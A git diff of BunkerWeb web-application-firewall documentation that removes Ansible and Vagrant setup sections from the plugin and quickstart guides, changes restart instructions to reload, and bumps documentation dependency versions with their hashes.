| **VirusTotal** | 1.5 | Automatically scans uploaded files with the VirusTotal API and denies the request when a file is detected as malicious. | [bunkerweb-plugins/virustotal](https://github.com/bunkerity/bunkerweb-plugins/tree/main/virustotal) |
| **WebHook** | 1.5 | Send security notifications to a custom HTTP endpoint using a Webhook. | [bunkerweb-plugins/webhook](https://github.com/bunkerity/bunkerweb-plugins/tree/main/webhook) |
## How to use a plugin
@ -22,7 +22,7 @@ Here is the list of "official" plugins that we maintain (see the [bunkerweb-plug
If you want to quickly install external plugins, you can use the `EXTERNAL_PLUGIN_URLS` setting. It takes a list of URLs, separated with space, pointing to compressed (zip format) archive containing one or more plugin(s).
You can use the following value if you want to automatically install the official plugins : `EXTERNAL_PLUGIN_URLS=https://github.com/bunkerity/bunkerweb-plugins/archive/refs/tags/v1.4.zip`
You can use the following value if you want to automatically install the official plugins : `EXTERNAL_PLUGIN_URLS=https://github.com/bunkerity/bunkerweb-plugins/archive/refs/tags/v1.5.zip`
### Manual
@ -248,49 +248,6 @@ The first step is to install the plugin by putting the plugin files inside the c
chown -R nginx:nginx /etc/bunkerweb/plugins
```
=== "Ansible"
When using the [Ansible integration](integrations.md#ansible), you can use the `plugins` variable to set a local folder containing your plugins that will be copied to your BunkerWeb instances.
Let's assume that you have plugins inside the `bunkerweb-plugins` folder :
```shell
git clone https://github.com/bunkerity/bunkerweb-plugins
```
In your Ansible inventory, you can use the `plugins` variable to set the path of plugins folder :
```ini
[mybunkers]
192.168.0.42 ... custom_plugins="{{ playbook_dir }}/bunkerweb-plugins"
```
Or alternatively, in your playbook file :
```yaml
- hosts: all
become: true
vars:
- custom_plugins: "{{ playbook_dir }}/bunkerweb-plugins"
roles:
- bunkerity.bunkerweb
```
Run the playbook :
```shell
ansible-playbook -i inventory.yml playbook.yml
```
=== "Vagrant"
When using the [Vagrant integration](integrations.md#vagrant), plugins must be written to the `/etc/bunkerweb/plugins` folder (you will need to do a `vagrant ssh` first) :
```shell
git clone https://github.com/bunkerity/bunkerweb-plugins && \
cp -rp ./bunkerweb-plugins/* /etc/bunkerweb/plugins
```
## Writing a plugin
### Structure

533
docs/quickstart-guide.md
View file

@ -243,106 +243,10 @@ You will find more settings about reverse proxy in the [settings section](settin
systemctl status bunkerweb
```
If it's already running, we can restart it :
If it's already running, we can reload it :
```shell
systemctl restart bunkerweb
```
Otherwise, we will need to start it :
```shell
systemctl start bunkerweb
```
=== "Ansible"
We will assume that you already have a service running and you want to use BunkerWeb as a reverse-proxy.
The following command will run a basic HTTP server on the port 8000 and deliver the files in the current directory :
```shell
python3 -m http.server -b 127.0.0.1
```
Content of the `my_variables.env` configuration file :
```conf
HTTP_PORT=80
HTTPS_PORT=443
DNS_RESOLVERS=9.9.9.9 8.8.8.8 8.8.4.4
API_LISTEN_IP=127.0.0.1
SERVER_NAME=www.example.com
USE_REVERSE_PROXY=yes
REVERSE_PROXY_URL=/
REVERSE_PROXY_HOST=http://127.0.0.1:8000
```
In your Ansible inventory, you can use the `variables_env` variable to set the path of configuration file :
```yaml
[mybunkers]
192.168.0.42 variables_env="{{ playbook_dir }}/my_variables.env"
```
Or alternatively, in your playbook file :
```yaml
- hosts: all
become: true
vars:
- variables_env: "{{ playbook_dir }}/my_variables.env"
roles:
- bunkerity.bunkerweb
```
You can now run the playbook :
```shell
ansible-playbook -i inventory.yml playbook.yml
```
=== "Vagrant"
We will assume that you already have the [Vagrant integration](integrations.md#vagrant) stack running on your machine.
The following command will run a basic HTTP server on the port 8000 and deliver the files in the current directory :
```shell
python3 -m http.server -b 127.0.0.1
```
Configuration of BunkerWeb is done by editing the `/etc/bunkerweb/variables.env` file.
Connect to your vagrant machine :
```shell
vagrant ssh
```
And then you can edit the `variables.env` file in your host machine like this :
```conf
SERVER_NAME=www.example.com
HTTP_PORT=80
HTTPS_PORT=443
DNS_RESOLVERS=9.9.9.9 8.8.8.8 8.8.4.4
API_LISTEN_IP=127.0.0.1
USE_REVERSE_PROXY=yes
REVERSE_PROXY_URL=/
REVERSE_PROXY_HOST=http://127.0.0.1:8000
```
Let's check the status of BunkerWeb :
```shell
systemctl status bunkerweb
```
If it's already running we can restart it :
```shell
systemctl restart bunkerweb
systemctl reload bunkerweb
```
Otherwise, we will need to start it :
@ -679,110 +583,10 @@ You will find more settings about reverse proxy in the [settings section](settin
systemctl status bunkerweb
```
If it's already running, we can restart it :
If it's already running, we can reload it :
```shell
systemctl restart bunkerweb
```
Otherwise, we will need to start it :
```shell
systemctl start bunkerweb
```
=== "Ansible"
We will assume that you already have a service running and you want to use BunkerWeb as a reverse-proxy.
The following command will run a basic HTTP server on the port 8001 and deliver the files in the current directory (repeat it and change the port if you want to test BunkerWeb) :
```shell
python3 -m http.server -b 127.0.0.1 8001
```
Content of the `my_variables.env` configuration file :
```conf
HTTP_PORT=80
HTTPS_PORT=443
DNS_RESOLVERS=9.9.9.9 8.8.8.8 8.8.4.4
API_LISTEN_IP=127.0.0.1
MULTISITE=yes
SERVER_NAME=app1.example.com app2.example.com app3.example.com
USE_REVERSE_PROXY=yes
REVERSE_PROXY_URL=/
app1.example.com_REVERSE_PROXY_HOST=http://127.0.0.1:8001
app2.example.com_REVERSE_PROXY_HOST=http://127.0.0.1:8002
app3.example.com_REVERSE_PROXY_HOST=http://127.0.0.1:8003
```
In your Ansible inventory, you can use the `variables_env` variable to set the path of configuration file :
```yaml
[mybunkers]
192.168.0.42 variables_env="{{ playbook_dir }}/my_variables.env"
```
Or alternatively, in your playbook file :
```yaml
- hosts: all
become: true
vars:
- variables_env: "{{ playbook_dir }}/my_variables.env"
roles:
- bunkerity.bunkerweb
```
You can now run the playbook :
```shell
ansible-playbook -i inventory.yml playbook.yml
```
=== "Vagrant"
We will assume that you already have the [Vagrant integration](integrations.md#vagrant) stack running on your machine.
First of all, connect to your vagrant machine :
```shell
vagrant ssh
```
The following command will run a basic HTTP server on the port 8001 and deliver the files in the current directory (repeat it and change the port if you want to test BunkerWeb) :
```shell
python3 -m http.server -b 127.0.0.1 8001
```
And then you can edit the `variables.env` file in your host machine like this :
```conf
HTTP_PORT=80
HTTPS_PORT=443
DNS_RESOLVERS=9.9.9.9 8.8.8.8 8.8.4.4
API_LISTEN_IP=127.0.0.1
MULTISITE=yes
SERVER_NAME=app1.example.com app2.example.com app3.example.com
USE_REVERSE_PROXY=yes
REVERSE_PROXY_URL=/
app1.example.com_REVERSE_PROXY_HOST=http://127.0.0.1:8001
app2.example.com_REVERSE_PROXY_HOST=http://127.0.0.1:8002
app3.example.com_REVERSE_PROXY_HOST=http://127.0.0.1:8003
```
Let's check the status of BunkerWeb :
```shell
systemctl status bunkerweb
```
If it's already running we can restart it :
```shell
systemctl restart bunkerweb
systemctl reload bunkerweb
```
Otherwise, we will need to start it :
@ -906,58 +710,12 @@ REAL_IP_HEADER=X-Forwarded-For
...
```
Don't forget to restart the BunkerWeb service once it's done.
=== "Ansible"
You will need to add the settings to your `my_variables.env` configuration file :
```conf
...
USE_REAL_IP=yes
REAL_IP_FROM=1.2.3.0/24 100.64.0.0/16
REAL_IP_HEADER=X-Forwarded-For
...
```
In your Ansible inventory, you can use the `variables_env` variable to set the path of configuration file :
```yaml
[mybunkers]
192.168.0.42 variables_env="{{ playbook_dir }}/my_variables.env"
```
Or alternatively, in your playbook file :
```yaml
- hosts: all
become: true
vars:
- variables_env: "{{ playbook_dir }}/my_variables.env"
roles:
- bunkerity.bunkerweb
```
Run the playbook :
Please note that it's recommended to issue a restart instead of reload when configuring settings related to proxy protocols :
```shell
ansible-playbook -i inventory.yml playbook.yml
systemctl restart bunkerweb
```
=== "Vagrant"
You will need to add the settings to the `/etc/bunkerweb/variables.env` file :
```conf
...
USE_REAL_IP=yes
REAL_IP_FROM=1.2.3.0/24 100.64.0.0/16
REAL_IP_HEADER=X-Forwarded-For
...
```
Don't forget to restart the BunkerWeb service once it's done.
### Proxy protocol
We will assume the following regarding the load balancers or reverse proxies (you will need to update the settings depending on your configuration) :
@ -1062,60 +820,12 @@ REAL_IP_HEADER=proxy_protocol
...
```
Don't forget to restart the BunkerWeb service once it's done.
=== "Ansible"
You will need to add the settings to your `my_variables.env` configuration file :
```conf
...
USE_REAL_IP=yes
USE_PROXY_PROTOCOL=yes
REAL_IP_FROM=1.2.3.0/24 100.64.0.0/16
REAL_IP_HEADER=proxy_protocol
...
```
In your Ansible inventory, you can use the `variables_env` variable to set the path of configuration file :
```yaml
[mybunkers]
192.168.0.42 variables_env="{{ playbook_dir }}/my_variables.env"
```
Or alternatively, in your playbook file :
```yaml
- hosts: all
become: true
vars:
- variables_env: "{{ playbook_dir }}/my_variables.env"
roles:
- bunkerity.bunkerweb
```
Run the playbook :
Please note that it's recommended to issue a restart instead of reload when configuring settings related to proxy protocols :
```shell
ansible-playbook -i inventory.yml playbook.yml
systemctl restart bunkerweb
```
=== "Vagrant"
You will need to add the settings to the `/etc/bunkerweb/variables.env` file :
```conf
...
USE_REAL_IP=yes
USE_PROXY_PROTOCOL=yes
REAL_IP_FROM=1.2.3.0/24 100.64.0.0/16
REAL_IP_HEADER=proxy_protocol
...
```
Don't forget to restart the BunkerWeb service once it's done.
## Protect UDP/TCP applications
!!! warning "Feature is in beta"
@ -1374,67 +1084,23 @@ For complete list of settings regarding `stream` mode, please refer to the [sett
...
```
Don't forget to restart the BunkerWeb service once it's done.
=== "Ansible"
You will need to add the settings to your `my_variables.env` configuration file :
```conf
...
SERVER_NAME=app1.example.com app2.example.com
MULTISITE=yes
USE_REVERSE_PROXY=yes
SERVER_TYPE=stream
app1.example.com_REVERSE_PROXY_HOST=myapp1.domain.or.ip:9000
app1.example.com_LISTEN_STREAM_PORT=10000
app2.example.com_REVERSE_PROXY_HOST=myapp2.domain.or.ip:9000
app2.example.com_LISTEN_STREAM_PORT=20000
...
```
In your Ansible inventory, you can use the `variables_env` variable to set the path of configuration file :
```yaml
[mybunkers]
192.168.0.42 variables_env="{{ playbook_dir }}/my_variables.env"
```
Or alternatively, in your playbook file :
```yaml
- hosts: all
become: true
vars:
- variables_env: "{{ playbook_dir }}/my_variables.env"
roles:
- bunkerity.bunkerweb
```
Run the playbook :
Let's check the status of BunkerWeb :
```shell
ansible-playbook -i inventory.yml playbook.yml
systemctl status bunkerweb
```
=== "Vagrant"
If it's already running, we can reload it :
You will need to add the settings to the `/etc/bunkerweb/variables.env` file :
```conf
...
SERVER_NAME=app1.example.com app2.example.com
MULTISITE=yes
USE_REVERSE_PROXY=yes
SERVER_TYPE=stream
app1.example.com_REVERSE_PROXY_HOST=myapp1.domain.or.ip:9000
app1.example.com_LISTEN_STREAM_PORT=10000
app2.example.com_REVERSE_PROXY_HOST=myapp2.domain.or.ip:9000
app2.example.com_LISTEN_STREAM_PORT=20000
...
```shell
systemctl reload bunkerweb
```
Don't forget to restart the BunkerWeb service once it's done.
Otherwise, we will need to start it :
```shell
systemctl start bunkerweb
```
## Custom configurations
@ -1671,72 +1337,23 @@ Some integrations provide more convenient ways to apply configurations, such as
chmod -R 770 /etc/bunkerweb/configs
```
Don't forget to restart the BunkerWeb service once it's done.
=== "Ansible"
The `custom_configs_path[]` variable is a dictionary with configuration types (`http`, `server-http`, `modsec`, `modsec-crs`, `stream` and `server-stream`) as keys and the corresponding values are path containing the configuration files.
Here is an example for server-http/hello-world.conf :
```conf
location /hello {
default_type 'text/plain';
content_by_lua_block {
ngx.say('world')
}
}
```
And the corresponding `custom_configs_path[server-http]` variable used in your inventory :
```yaml
[mybunkers]
192.168.0.42 custom_configs_path={"server-http": "{{ playbook_dir }}/server-http"}
```
Or alternatively, in your playbook file :
```yaml
- hosts: all
become: true
vars:
- custom_configs_path: {
server-http: "{{ playbook_dir }}/server-http"
}
roles:
- bunkerity.bunkerweb
```
Run the playbook :
Let's check the status of BunkerWeb :
```shell
ansible-playbook -i inventory.yml playbook.yml
systemctl status bunkerweb
```
=== "Vagrant"
When using the [Vagrant integration](integrations.md#vagrant), custom configurations must be written to the `/etc/bunkerweb/configs` folder.
Here is an example for server-http/hello-world.conf :
```conf
location /hello {
default_type 'text/plain';
content_by_lua_block {
ngx.say('world')
}
}
```
Because BunkerWeb runs as an unprivileged user (nginx:nginx), you will need to edit the permissions :
If it's already running, we can reload it :
```shell
chown -R root:nginx /etc/bunkerweb/configs && \
chmod -R 770 /etc/bunkerweb/configs
systemctl reload bunkerweb
```
Don't forget to restart the BunkerWeb service once it's done.
Otherwise, we will need to start it :
```shell
systemctl start bunkerweb
```
## PHP
@ -2225,102 +1842,10 @@ BunkerWeb supports PHP using external or remote [PHP-FPM](https://www.php.net/ma
systemctl status bunkerweb
```
If it's already running we can restart it :
If it's already running we can reload it :
```shell
systemctl restart bunkerweb
```
Otherwise, we will need to start it :
```shell
systemctl start bunkerweb
```
=== "Ansible"
!!! info "Linux"
Please follow the instruction for Linux integration to create a local `www` folder (permissions are not needed, Ansible will do it for you).
We will assume that you already have the [Ansible integration](integrations.md#ansible) setup on your machine.
Content of the `my_variables.env` configuration file :
```conf
HTTP_PORT=80
HTTPS_PORT=443
DNS_RESOLVERS=9.9.9.9 8.8.8.8 8.8.4.4
API_LISTEN_IP=127.0.0.1
MULTISITE=yes
SERVER_NAME=app1.example.com app2.example.com app3.example.com
app1.example.com_LOCAL_PHP=/run/php/php-fpm.sock
app1.example.com_LOCAL_PHP_PATH=/var/www/html/app1.example.com
app2.example.com_LOCAL_PHP=/run/php/php-fpm.sock
app2.example.com_LOCAL_PHP_PATH=/var/www/html/app2.example.com
app3.example.com_LOCAL_PHP=/run/php/php-fpm.sock
app3.example.com_LOCAL_PHP_PATH=/var/www/html/app3.example.com
```
The `custom_site` variable can be used to specify a directory containing your application files (e.g : `www`) that will be copied to `/var/www/html` and the `custom_www_owner` variable contains the owner that should be set for the files and folders. Here is an example using the Ansible inventory (replace `www-data` with the user running the PHP-FPM service):
```ini
[mybunkers]
192.168.0.42 variables_env="{{ playbook_dir }}/my_variables.env" custom_www="{{ playbook_dir }}/my_app" custom_www_owner="www-data"
```
Or alternatively, in your playbook file :
```yaml
- hosts: all
become: true
vars:
- variables_env: "{{ playbook_dir }}/my_variables.env"
- custom_www: "{{ playbook_dir }}/www"
- custom_www_owner: "www-data"
roles:
- bunkerity.bunkerweb
```
You can now run the playbook :
```shell
ansible-playbook -i inventory.yml playbook.yml
```
=== "Vagrant"
!!! info "Linux"
Please follow the instruction for Linux integration to create the `/var/www/html` folder.
We will assume that you already have the [Vagrant integration](integrations.md#vagrant) stack running on your machine.
Once PHP files are copied into the `/var/www/html`folder, you can now edit the `/etc/bunkerweb/variable.env` file :
```conf
HTTP_PORT=80
HTTPS_PORT=443
DNS_RESOLVERS=9.9.9.9 8.8.8.8 8.8.4.4
API_LISTEN_IP=127.0.0.1
MULTISITE=yes
SERVER_NAME=app1.example.com app2.example.com app3.example.com
app1.example.com_LOCAL_PHP=/run/php/php-fpm.sock
app1.example.com_LOCAL_PHP_PATH=/var/www/html/app1.example.com
app2.example.com_LOCAL_PHP=/run/php/php-fpm.sock
app2.example.com_LOCAL_PHP_PATH=/var/www/html/app2.example.com
app3.example.com_LOCAL_PHP=/run/php/php-fpm.sock
app3.example.com_LOCAL_PHP_PATH=/var/www/html/app3.example.com
```
Let's check the status of BunkerWeb :
```shell
systemctl status bunkerweb
```
If it's already running we can restart it :
```shell
systemctl restart bunkerweb
systemctl reload bunkerweb
```
Otherwise, we will need to start it :

6
docs/requirements.in
View file

@ -1,4 +1,4 @@
mike==2.0.0
mkdocs-material[imaging]==9.5.20
mkdocs-print-site-plugin==2.4.0
mike==2.1.1
mkdocs-material[imaging]==9.5.22
mkdocs-print-site-plugin==2.4.1
pytablewriter==1.2.0

200
docs/requirements.txt
View file

@ -4,9 +4,9 @@
#
# pip-compile --allow-unsafe --generate-hashes --strip-extras requirements.in
#
babel==2.14.0 \
--hash=sha256:6919867db036398ba21eb5c7a0f6b28ab8cbc3ae7a73a44ebe34ae74a4e7d363 \
--hash=sha256:efb1a25b7118e67ce3a259bed20545c29cb68be8ad2c784c83689981b7a57287
babel==2.15.0 \
--hash=sha256:08706bdad8d0a3413266ab61bd6c34d0c28d6e1e7badf40a2cebe67644e2e1fb \
--hash=sha256:8daf0e265d05768bc6c7a314cf1321e9a123afc328cc635c18622a2f30a04413
# via mkdocs-material
cairocffi==1.7.0 \
--hash=sha256:1f29a8d41dbda4090c0aa33bcdea64f3b493e95f74a43ea107c4a8a7b7f632ef \
@ -212,9 +212,9 @@ importlib-resources==6.4.0 \
--hash=sha256:50d10f043df931902d4194ea07ec57960f66a80449ff867bfe782b4c486ba78c \
--hash=sha256:cdb2b453b8046ca4e3798eb1d84f3cce1446a0e8e7b5ef4efb600f19fc398145
# via mike
jinja2==3.1.3 \
--hash=sha256:7d6d50dd97d52cbc355597bd845fabfbac3f551e1f99619e39a35ce8c370b5fa \
--hash=sha256:ac8bd6544d4bb2c9792bf3a159e80bba8fda7f07e81bc3aed565432d5925ba90
jinja2==3.1.4 \
--hash=sha256:4a3aee7acbbe7303aede8e9648d13b8bf88a429282aa6122a993f0ac800cb369 \
--hash=sha256:bc5dd2abb727a5319567b7a813e6a2e7318c39f4f487cfe6c89c6f9c7d25197d
# via
# mike
# mkdocs
@ -303,9 +303,9 @@ mergedeep==1.3.4 \
# via
# mkdocs
# mkdocs-get-deps
mike==2.0.0 \
--hash=sha256:566f1cab1a58cc50b106fb79ea2f1f56e7bfc8b25a051e95e6eaee9fba0922de \
--hash=sha256:87f496a65900f93ba92d72940242b65c86f3f2f82871bc60ebdcffc91fad1d9e
mike==2.1.1 \
--hash=sha256:0b1d01a397a423284593eeb1b5f3194e37169488f929b860c9bfe95c0d5efb79 \
--hash=sha256:f39ed39f3737da83ad0adc33e9f885092ed27f8c9e7ff0523add0480352a2c22
# via -r requirements.in
mkdocs==1.6.0 \
--hash=sha256:1eb5cb7676b7d89323e62b56235010216319217d4af5ddc543a91beb8d125ea7 \
@ -317,9 +317,9 @@ mkdocs-get-deps==0.2.0 \
--hash=sha256:162b3d129c7fad9b19abfdcb9c1458a651628e4b1dea628ac68790fb3061c60c \
--hash=sha256:2bf11d0b133e77a0dd036abeeb06dec8775e46efa526dc70667d8863eefc6134
# via mkdocs
mkdocs-material==9.5.20 \
--hash=sha256:986eef0250d22f70fb06ce0f4eac64cc92bd797a589ec3892ce31fad976fe3da \
--hash=sha256:ad0094a7597bcb5d0cc3e8e543a10927c2581f7f647b9bb4861600f583180f9b
mkdocs-material==9.5.22 \
--hash=sha256:22a853a456ae8c581c4628159574d6fc7c71b2c7569dc9c3a82cc70432219599 \
--hash=sha256:8c7a377d323567934e6cd46915e64dc209efceaec0dec1cf2202184f5649862c
# via
# -r requirements.in
# mkdocs-print-site-plugin
@ -327,9 +327,9 @@ mkdocs-material-extensions==1.3.1 \
--hash=sha256:10c9511cea88f568257f960358a467d12b970e1f7b2c0e5fb2bb48cab1928443 \
--hash=sha256:adff8b62700b25cb77b53358dad940f3ef973dd6db797907c49e3c2ef3ab4e31
# via mkdocs-material
mkdocs-print-site-plugin==2.4.0 \
--hash=sha256:2257e8116cdea6c4063a2bbd84c8cf00ace62de4cb2e09516124a08c20fc2033 \
--hash=sha256:b44d4533c5be8bd4676d61ff9b8a946dc340ef5e745a8c60fe1072e22032b2d8
mkdocs-print-site-plugin==2.4.1 \
--hash=sha256:8c05bdd6b34095fdfdb77a37a117106d4ba362ac5145a1664a3bef53b8cc9ba5 \
--hash=sha256:c62eda1d47b65e48aa5a9316cb8ea93c035a342b5648b84bd892f48729aea6c9
# via -r requirements.in
packaging==24.0 \
--hash=sha256:2ddfb553fdf02fb784c234c7ba6ccc288296ceabec964ad2eae3777778130bc5 \
@ -429,9 +429,9 @@ pycparser==2.22 \
--hash=sha256:491c8be9c040f5390f5bf44a5b07752bd07f56edf992381b05c701439eec10f6 \
--hash=sha256:c3702b6d3dd8c7abc1afa565d7e63d53a1d0bd86cdc24edd75470f4de499cfcc
# via cffi
pygments==2.17.2 \
--hash=sha256:b27c2826c47d0f3219f29554824c30c5e8945175d888647acd804ddd04af846c \
--hash=sha256:da46cec9fd2de5be3a8a784f434e4c4ab670b4ff54d605c4c2717e9d49c4c367
pygments==2.18.0 \
--hash=sha256:786ff802f32e91311bff3889f6e9a86e81505fe99f2735bb6d60ae0c5004f199 \
--hash=sha256:b8e6aca0523f3ab76fee51799c488e38782ac06eafcf95e7ba832985c8e7b13a
# via mkdocs-material
pymdown-extensions==10.8.1 \
--hash=sha256:3ab1db5c9e21728dabf75192d71471f8e50f216627e9a1fa9535ecb0231b9940 \
@ -516,87 +516,89 @@ pyyaml==6.0.1 \
pyyaml-env-tag==0.1 \
--hash=sha256:70092675bda14fdec33b31ba77e7543de9ddc88f2e5b99160396572d11525bdb \
--hash=sha256:af31106dec8a4d68c60207c1886031cbf839b68aa7abccdb19868200532c2069
# via mkdocs
regex==2024.4.28 \
--hash=sha256:05d9b6578a22db7dedb4df81451f360395828b04f4513980b6bd7a1412c679cc \
--hash=sha256:08a1749f04fee2811c7617fdd46d2e46d09106fa8f475c884b65c01326eb15c5 \
--hash=sha256:0940038bec2fe9e26b203d636c44d31dd8766abc1fe66262da6484bd82461ccf \
--hash=sha256:0a2a512d623f1f2d01d881513af9fc6a7c46e5cfffb7dc50c38ce959f9246c94 \
--hash=sha256:0a54a047b607fd2d2d52a05e6ad294602f1e0dec2291152b745870afc47c1397 \
--hash=sha256:0dd3f69098511e71880fb00f5815db9ed0ef62c05775395968299cb400aeab82 \
--hash=sha256:1031a5e7b048ee371ab3653aad3030ecfad6ee9ecdc85f0242c57751a05b0ac4 \
--hash=sha256:108e2dcf0b53a7c4ab8986842a8edcb8ab2e59919a74ff51c296772e8e74d0ae \
--hash=sha256:144a1fc54765f5c5c36d6d4b073299832aa1ec6a746a6452c3ee7b46b3d3b11d \
--hash=sha256:19d6c11bf35a6ad077eb23852827f91c804eeb71ecb85db4ee1386825b9dc4db \
--hash=sha256:1f687a28640f763f23f8a9801fe9e1b37338bb1ca5d564ddd41619458f1f22d1 \
--hash=sha256:224803b74aab56aa7be313f92a8d9911dcade37e5f167db62a738d0c85fdac4b \
--hash=sha256:23a412b7b1a7063f81a742463f38821097b6a37ce1e5b89dd8e871d14dbfd86b \
--hash=sha256:25f87ae6b96374db20f180eab083aafe419b194e96e4f282c40191e71980c666 \
--hash=sha256:2630ca4e152c221072fd4a56d4622b5ada876f668ecd24d5ab62544ae6793ed6 \
--hash=sha256:28e1f28d07220c0f3da0e8fcd5a115bbb53f8b55cecf9bec0c946eb9a059a94c \
--hash=sha256:2b51739ddfd013c6f657b55a508de8b9ea78b56d22b236052c3a85a675102dc6 \
--hash=sha256:2cc1b87bba1dd1a898e664a31012725e48af826bf3971e786c53e32e02adae6c \
--hash=sha256:2fef0b38c34ae675fcbb1b5db760d40c3fc3612cfa186e9e50df5782cac02bcd \
--hash=sha256:36f392dc7763fe7924575475736bddf9ab9f7a66b920932d0ea50c2ded2f5636 \
--hash=sha256:374f690e1dd0dbdcddea4a5c9bdd97632cf656c69113f7cd6a361f2a67221cb6 \
--hash=sha256:3986217ec830c2109875be740531feb8ddafe0dfa49767cdcd072ed7e8927962 \
--hash=sha256:39fb166d2196413bead229cd64a2ffd6ec78ebab83fff7d2701103cf9f4dfd26 \
--hash=sha256:4290035b169578ffbbfa50d904d26bec16a94526071ebec3dadbebf67a26b25e \
--hash=sha256:43548ad74ea50456e1c68d3c67fff3de64c6edb85bcd511d1136f9b5376fc9d1 \
--hash=sha256:44a22ae1cfd82e4ffa2066eb3390777dc79468f866f0625261a93e44cdf6482b \
--hash=sha256:457c2cd5a646dd4ed536c92b535d73548fb8e216ebee602aa9f48e068fc393f3 \
--hash=sha256:459226445c7d7454981c4c0ce0ad1a72e1e751c3e417f305722bbcee6697e06a \
--hash=sha256:47af45b6153522733aa6e92543938e97a70ce0900649ba626cf5aad290b737b6 \
--hash=sha256:499334ad139557de97cbc4347ee921c0e2b5e9c0f009859e74f3f77918339257 \
--hash=sha256:57ba112e5530530fd175ed550373eb263db4ca98b5f00694d73b18b9a02e7185 \
--hash=sha256:5ce479ecc068bc2a74cb98dd8dba99e070d1b2f4a8371a7dfe631f85db70fe6e \
--hash=sha256:5dbc1bcc7413eebe5f18196e22804a3be1bfdfc7e2afd415e12c068624d48247 \
--hash=sha256:6277d426e2f31bdbacb377d17a7475e32b2d7d1f02faaecc48d8e370c6a3ff31 \
--hash=sha256:66372c2a01782c5fe8e04bff4a2a0121a9897e19223d9eab30c54c50b2ebeb7f \
--hash=sha256:670fa596984b08a4a769491cbdf22350431970d0112e03d7e4eeaecaafcd0fec \
--hash=sha256:6f435946b7bf7a1b438b4e6b149b947c837cb23c704e780c19ba3e6855dbbdd3 \
--hash=sha256:7413167c507a768eafb5424413c5b2f515c606be5bb4ef8c5dee43925aa5718b \
--hash=sha256:7c3d389e8d76a49923683123730c33e9553063d9041658f23897f0b396b2386f \
--hash=sha256:7d77b6f63f806578c604dca209280e4c54f0fa9a8128bb8d2cc5fb6f99da4150 \
--hash=sha256:7e76b9cfbf5ced1aca15a0e5b6f229344d9b3123439ffce552b11faab0114a02 \
--hash=sha256:7f3502f03b4da52bbe8ba962621daa846f38489cae5c4a7b5d738f15f6443d17 \
--hash=sha256:7fe9739a686dc44733d52d6e4f7b9c77b285e49edf8570754b322bca6b85b4cc \
--hash=sha256:83ab366777ea45d58f72593adf35d36ca911ea8bd838483c1823b883a121b0e4 \
--hash=sha256:84077821c85f222362b72fdc44f7a3a13587a013a45cf14534df1cbbdc9a6796 \
--hash=sha256:8bb381f777351bd534462f63e1c6afb10a7caa9fa2a421ae22c26e796fe31b1f \
--hash=sha256:92da587eee39a52c91aebea8b850e4e4f095fe5928d415cb7ed656b3460ae79a \
--hash=sha256:9301cc6db4d83d2c0719f7fcda37229691745168bf6ae849bea2e85fc769175d \
--hash=sha256:965fd0cf4694d76f6564896b422724ec7b959ef927a7cb187fc6b3f4e4f59833 \
--hash=sha256:99d6a550425cc51c656331af0e2b1651e90eaaa23fb4acde577cf15068e2e20f \
--hash=sha256:99ef6289b62042500d581170d06e17f5353b111a15aa6b25b05b91c6886df8fc \
--hash=sha256:a1409c4eccb6981c7baabc8888d3550df518add6e06fe74fa1d9312c1838652d \
--hash=sha256:a74fcf77d979364f9b69fcf8200849ca29a374973dc193a7317698aa37d8b01c \
--hash=sha256:aaa179975a64790c1f2701ac562b5eeb733946eeb036b5bcca05c8d928a62f10 \
--hash=sha256:ac69b394764bb857429b031d29d9604842bc4cbfd964d764b1af1868eeebc4f0 \
--hash=sha256:b45d4503de8f4f3dc02f1d28a9b039e5504a02cc18906cfe744c11def942e9eb \
--hash=sha256:b7d893c8cf0e2429b823ef1a1d360a25950ed11f0e2a9df2b5198821832e1947 \
--hash=sha256:b8eb28995771c087a73338f695a08c9abfdf723d185e57b97f6175c5051ff1ae \
--hash=sha256:b91d529b47798c016d4b4c1d06cc826ac40d196da54f0de3c519f5a297c5076a \
--hash=sha256:bc365ce25f6c7c5ed70e4bc674f9137f52b7dd6a125037f9132a7be52b8a252f \
--hash=sha256:bf29304a8011feb58913c382902fde3395957a47645bf848eea695839aa101b7 \
--hash=sha256:c06bf3f38f0707592898428636cbb75d0a846651b053a1cf748763e3063a6925 \
--hash=sha256:c77d10ec3c1cf328b2f501ca32583625987ea0f23a0c2a49b37a39ee5c4c4630 \
--hash=sha256:cd196d056b40af073d95a2879678585f0b74ad35190fac04ca67954c582c6b61 \
--hash=sha256:d7a353ebfa7154c871a35caca7bfd8f9e18666829a1dc187115b80e35a29393e \
--hash=sha256:d84308f097d7a513359757c69707ad339da799e53b7393819ec2ea36bc4beb58 \
--hash=sha256:dd7ef715ccb8040954d44cfeff17e6b8e9f79c8019daae2fd30a8806ef5435c0 \
--hash=sha256:e672cf9caaf669053121f1766d659a8813bd547edef6e009205378faf45c67b8 \
--hash=sha256:ecc6148228c9ae25ce403eade13a0961de1cb016bdb35c6eafd8e7b87ad028b1 \
--hash=sha256:f1c5742c31ba7d72f2dedf7968998730664b45e38827637e0f04a2ac7de2f5f1 \
--hash=sha256:f1d6e4b7b2ae3a6a9df53efbf199e4bfcff0959dbdb5fd9ced34d4407348e39a \
--hash=sha256:f2fc053228a6bd3a17a9b0a3f15c3ab3cf95727b00557e92e1cfe094b88cc662 \
--hash=sha256:f57515750d07e14743db55d59759893fdb21d2668f39e549a7d6cad5d70f9fea \
--hash=sha256:f85151ec5a232335f1be022b09fbbe459042ea1951d8a48fef251223fc67eee1 \
--hash=sha256:fb0315a2b26fde4005a7c401707c5352df274460f2f85b209cf6024271373013 \
--hash=sha256:fc0916c4295c64d6890a46e02d4482bb5ccf33bf1a824c0eaa9e83b148291f90 \
--hash=sha256:fd24fd140b69f0b0bcc9165c397e9b2e89ecbeda83303abf2a072609f60239e2 \
--hash=sha256:fdae0120cddc839eb8e3c15faa8ad541cc6d906d3eb24d82fb041cfe2807bc1e \
--hash=sha256:fe00f4fe11c8a521b173e6324d862ee7ee3412bf7107570c9b564fe1119b56fb
# via
# mike
# mkdocs
regex==2024.5.10 \
--hash=sha256:031219782d97550c2098d9a68ce9e9eaefe67d2d81d8ff84c8354f9c009e720c \
--hash=sha256:0709ba544cf50bd5cb843df4b8bb6701bae2b70a8e88da9add8386cbca5c1385 \
--hash=sha256:0a9f89d7db5ef6bdf53e5cc8e6199a493d0f1374b3171796b464a74ebe8e508a \
--hash=sha256:0bc94873ba11e34837bffd7e5006703abeffc4514e2f482022f46ce05bd25e67 \
--hash=sha256:0ce56a923f4c01d7568811bfdffe156268c0a7aae8a94c902b92fe34c4bde785 \
--hash=sha256:0faecb6d5779753a6066a3c7a0471a8d29fe25d9981ca9e552d6d1b8f8b6a594 \
